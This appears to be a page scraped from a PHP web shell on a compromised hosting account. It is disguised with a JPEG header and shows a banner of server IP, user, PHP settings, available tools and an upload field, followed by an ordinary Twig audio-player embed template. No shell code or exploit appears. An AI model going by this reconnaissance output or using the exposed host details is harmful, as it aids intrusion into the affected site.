����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.220.224.115 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/plugins/filepreviewer/views/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title>{{ SITE_CONFIG_SITE_NAME }}</title> <meta name="description" content="{{ PAGE_DESCRIPTION }}" /> <meta name="keywords" content="{{ PAGE_KEYWORDS }}" /> <meta name="copyright" content="Copyright © {{ "now"|date("Y") }} - {{ SITE_CONFIG_SITE_NAME }}" /> <meta name="robots" content="all" /> <meta http-equiv="Cache-Control" content="no-cache" /> <meta http-equiv="Expires" content="-1" /> <meta http-equiv="Pragma" content="no-cache" /> <script src="{{ theme.getAccountJsPath() }}/jquery-1.11.0.min.js"></script> <script type="text/javascript" src="{{ PLUGIN_WEB_ROOT }}/filepreviewer/assets/players/ultimate/java/FWDUVPlayer.js"></script> <script> var LOGGED_IN = {% if Auth.loggedIn() == 'true' %}true{% else %}false{% endif %}; var IS_EMBED = true; </script> {{ theme.outputHeadJSCode()|raw }} </head> <body style="width: {{ playerMaxWidth }}px; height: {{ playerMaxHeight }}px; padding: 0px; margin: 0px;"> <div class="embedded clear-adblock"> <div style="width: {{ playerMaxWidth }}px; height: {{ playerMaxHeight }}px;"> {% include '@themePath/account/partial/_preview_audio_'~audioPlayer~'.html.twig' with {'IS_EMBED': IS_EMBED} %} </div> </div> {% include '@themePath/partial/_ad_block.html.twig' ignore missing %} {{ not SITE_CONFIG_GOOGLE_ANALYTICS_CODE ? "" : SITE_CONFIG_GOOGLE_ANALYTICS_CODE|raw }} </body> </html>